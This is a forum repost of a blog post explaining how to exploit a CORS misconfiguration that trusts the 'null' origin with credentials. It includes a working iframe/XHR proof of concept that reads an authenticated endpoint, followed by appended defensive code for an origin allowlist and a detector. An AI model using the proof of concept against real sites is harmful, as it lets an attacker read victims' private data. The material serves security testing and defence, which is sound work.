Nytro Posted April 23, 2018

Monday, 23 April 2018

Exploiting misconfigured CORS Null Origin

Almost two years ago, in October 2016, James Kettle published an excellent blog post about the various types of Cross-Origin Resource Sharing (CORS) misconfigurations and how they can be exploited. Recently, I encountered a web application that allowed for two-way interaction with the so-called null origin. More precisely, when sending an HTTP request specifying the header:

    Origin: null

the server would respond with the following two HTTP headers:

    Access-Control-Allow-Origin: null
    Access-Control-Allow-Credentials: true

This configuration allows us to issue arbitrary requests to the application as long as we can set the Origin header to null. According to Kettle's blog post, it can be exploited by issuing the request from within an iframe using a data-url as follows:

    <iframe sandbox="allow-scripts allow-top-navigation allow-forms" src='data:text/html,<script>*cors stuff here*</script>'></iframe>

Although the code above gives a hint in the right direction, it falls short of a complete proof of concept. I struggled to find code that would work across the browsers Chrome and Firefox, but eventually succeeded with the following snippet:

    <html>
    <body>
    <iframe src='data:text/html,<script>
    var xhr = new XMLHttpRequest();
    xhr.open("GET", "https://vuln-app.com/confidential", true);
    xhr.withCredentials = true;
    xhr.onload = function () {
      if (xhr.readyState === xhr.DONE) {
        console.log(xhr.response);
      }
    };
    xhr.send(null);
    </script>'></iframe>
    </body>
    </html>

As soon as the page above is opened, a request to https://vuln-app.com/confidential should be issued with an Origin: null HTTP header and the corresponding HTTP response should be shown in the browser console.

Source: https://www.soffensive.com/2018/04/exploiting-misconfigured-cors-null.html
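The same misconfiguration seen from the defender's side, as an added example that is not part of the original post or the soffensive article: a server-side allowlist that never trusts the literal null origin, beside a checker that flags responses carrying the two headers quoted above. The allowlist origins and the sample response headers are constructed for this example.

```javascript
// Added example (not from the original post): hardened CORS origin handling
// and a detector for the "null origin with credentials" response pattern.
// Assumes plain header objects with lowercase keys; no framework required.

// Hypothetical explicit allowlist of trusted origins (constructed for this example).
const ALLOWED_ORIGINS = new Set(["https://app.example", "https://admin.example"]);

// Hardened handler: returns the CORS headers to emit for a given request Origin.
// The literal string "null" (sandboxed iframes, data: URLs, file://) is rejected
// even if it was added to the allowlist by mistake, and a wildcard is never
// combined with credentials. An unknown origin gets no ACAO header at all, so
// the browser refuses the cross-origin read.
function corsHeadersFor(origin, allowlist = ALLOWED_ORIGINS) {
  if (typeof origin !== "string" || origin === "null" || !allowlist.has(origin)) {
    return { vary: "Origin" };
  }
  return {
    "access-control-allow-origin": origin,
    "access-control-allow-credentials": "true",
    vary: "Origin", // keep caches from serving one origin's ACAO to another
  };
}

// Detection side: classify a captured response (e.g. from a proxy log) that was
// sent in reply to a request carrying "Origin: null".
function classifyNullOriginResponse(responseHeaders) {
  const acao = (responseHeaders["access-control-allow-origin"] || "").trim();
  const creds = (responseHeaders["access-control-allow-credentials"] || "")
    .trim()
    .toLowerCase();
  if (acao === "null" && creds === "true") return "vulnerable: null origin with credentials";
  if (acao === "null") return "weak: null origin allowed (no credentials)";
  if (acao === "*" && creds === "true") return "invalid: wildcard with credentials (browsers reject)";
  return "ok";
}

// Constructed sample: the two response headers quoted in the post above.
const SAMPLE_RESPONSE = {
  "access-control-allow-origin": "null",
  "access-control-allow-credentials": "true",
};

console.log(classifyNullOriginResponse(SAMPLE_RESPONSE)); // vulnerable: null origin with credentials
console.log(corsHeadersFor("null")); // { vary: 'Origin' }
```

Point `classifyNullOriginResponse` at responses recorded while probing your own applications with an `Origin: null` request to find the configuration described in the post before someone else does.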